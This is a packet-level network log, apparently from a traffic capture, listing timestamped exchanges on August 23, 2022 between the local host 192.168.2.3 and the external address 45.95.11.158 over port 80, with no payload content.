Aug 23, 2022 03:42:57.957707882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957798958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957812071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957856894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957861900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957900047 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.957928896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957956076 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.957962036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.958246946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.958302975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.958530903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.959443092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.959551096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.959575891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.960279942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.960367918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.960786104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.960829020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.960864067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.960869074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.960887909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.960911036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.960922003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.960973978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.960979939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.961030960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.961035967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.961074114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.961100101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.961118937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.961129904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.961180925 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.961199999 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.961241961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.961246014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.961289883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.961297989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.961347103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.961388111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.961405993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.961448908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.961457968 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.961491108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.961534977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.961550951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.961592913 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.961595058 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.961648941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.961719036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.962229967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.962352991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.962419033 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.962476969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.962493896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.962539911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.962543964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.962594986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.962618113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.962655067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.962698936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.962724924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.962754965 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.962759018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.962807894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.962873936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.963463068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.963567972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.963637114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.963748932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.963789940 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.963828087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.963855982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.963875055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.964977980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.965019941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.965059996 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.965086937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.965105057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.965114117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.965121031 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.965176105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.965184927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.965233088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.965281963 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.965281963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.965300083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.965339899 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.965405941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.965744972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.965791941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.965840101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.965863943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.965895891 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.989124060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.989183903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.989224911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.989267111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.989278078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.989295959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.989305973 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.989330053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.989341021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.989392996 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.989407063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.989438057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.989456892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.989500046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.989509106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.989556074 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.989572048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.989614010 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.989645004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.989697933 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.989717007 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.990062952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990106106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990149021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990176916 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.990189075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990258932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.990286112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990338087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990353107 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.990396976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990428925 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990463018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.990480900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.990483046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990537882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990547895 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.990598917 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.990600109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990638971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990681887 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990717888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.990736961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990782976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990812063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990852118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990890980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990931034 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990958929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.990998983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991040945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991080046 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991107941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991147041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991199970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991241932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991274118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991314888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991322994 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991332054 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991342068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991349936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991358042 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991365910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991374016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991381884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991390944 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991400003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991424084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991483927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991491079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991528988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991544962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991589069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991597891 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991652012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991653919 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991709948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991713047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991751909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991769075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991811991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991854906 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991883039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991913080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991947889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.991990089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.991995096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.992007971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.992053986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.992095947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.992115021 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.992137909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.992186069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.992197037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.992242098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.992244959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.992297888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.992327929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.992367983 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.992387056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993273020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993316889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993357897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993380070 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993397951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993401051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993454933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993496895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993539095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993549109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993551970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993561029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993567944 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993591070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993639946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993642092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993659019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993699074 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993704081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993755102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993779898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993797064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993823051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993869066 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993899107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993942976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.993971109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.993999004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.994000912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.994039059 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.994055986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.994098902 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.994251013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.994302988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.994316101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.994364023 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.994364977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.994406939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:57.994425058 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:57.994472027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.021451950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.021522999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.021563053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.021594048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.021604061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.021634102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.021677017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.021714926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.021756887 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.021800995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.021832943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.021872997 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.021997929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.022020102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.022026062 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.022032022 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.022854090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.022901058 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.022943974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.022975922 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.022983074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023005962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023015022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.023016930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023052931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023056030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.023092985 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023134947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023154020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.023183107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.023222923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.023256063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023262978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.023282051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023288012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023304939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.023333073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.023351908 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023399115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023402929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.023405075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023442030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.023451090 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023483992 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.023514986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.023540020 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023595095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.023956060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.023998022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024029970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.024036884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024068117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024091959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.024107933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024144888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.024148941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024179935 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.024189949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024203062 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.024218082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024291039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.024334908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024374962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024415016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024432898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.024445057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024472952 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.024501085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.024833918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024873018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024899960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.024913073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024938107 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.024941921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.024955988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.024996996 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.025434017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.025475979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.025513887 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.025542021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.025547028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.025578022 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.025629044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.025718927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.025759935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.025798082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.025826931 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.025837898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.025902033 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026273012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026319027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026343107 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026359081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026385069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026398897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026410103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.026441097 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.026448011 CEST	49774	80	192.168.2.3	45.95.11.158
